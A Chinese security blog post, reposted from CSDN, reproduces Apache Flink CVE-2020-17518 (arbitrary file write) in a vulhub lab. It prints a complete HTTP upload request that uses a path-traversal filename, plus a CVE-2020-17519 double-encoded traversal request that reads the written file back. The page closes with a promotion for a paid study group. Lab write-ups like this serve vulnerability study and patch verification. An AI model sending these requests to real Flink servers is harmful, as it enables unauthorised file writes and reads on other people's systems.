飞道的博客

追洞小组 | 实战CVE-2020-17518漏洞

274人阅读  评论(0)

文章来源|MS08067 WEB攻防知识星球

本文作者:L(Ms08067实验室追洞小组成员)

漏洞复现分析  认准追洞小组

一、漏洞名称:

Apache Flink 任意文件写入漏洞

二、漏洞编号:

CVE-2020-17518

三、漏洞描述:

远程攻击者通过REST API目录遍历,可造成任意文件写入的影响

四、影响版本:

1.5.1 – 1.11.2

五、漏洞分析

Flink 1.5.1版本中引入了REST API,该漏洞允许攻击者通过构造恶意的HTTP header,将上传的文件写入到本地文件系统上的任意位置

六、实验环境及准备:

实验环境使用vulhub搭建


   
  1. cd vulhub-master/flink/CVE-2020-17518/
  2. docker-compose build
  3. docker-compose up -d

七、复现步骤:

目标版本为1.11.2

构造POC


   
  1. POST /jars/upload HTTP/1.1
  2. Host: 172.16.12.144:8081
  3. Accept-Encoding: gzip, deflate
  4. Accept: */*
  5. Accept-Language: en
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  7. Connection: close
  8. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
  9. Content-Length: 179
  10. ------WebKitFormBoundaryoZ8meKnrrso89R6Y
  11. Content-Disposition: form-data; name= "jarfile"; filename= "../../../../../../tmp/test"
  12. test
  13. ------WebKitFormBoundaryoZ8meKnrrso89R6Y--

尽管响应码为400,并且出现报错信息,但实际上我们的文件依然是上传成功的

利用CVE-2020-17519(Apache Flink Version:1.11.0,1.11.1,1.11.2任意文件读取漏洞)验证文件是否写入成功


   
  1. GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252ftest HTTP/ 1.1
  2. Host: 172.16. 12.144: 8081
  3. Cache-Control: max-age= 0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/ 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/ 79.0. 3945.130 Safari/ 537.36
  6. Accept: text/html,application/xhtml+xml,application/xml; q= 0. 9,image/webp,image/apng,* /*;q=0.8,application/signed-exchange;v=b3; q= 0. 9
  7. Accept-Encoding: gzip, deflate
  8. Accept-Language: zh-CN,zh; q= 0. 9
  9. Connection: close

成功写入

扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

 

 

目前36000+人已关注加入我们


转载:https://blog.csdn.net/shuteer_xu/article/details/114006265
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场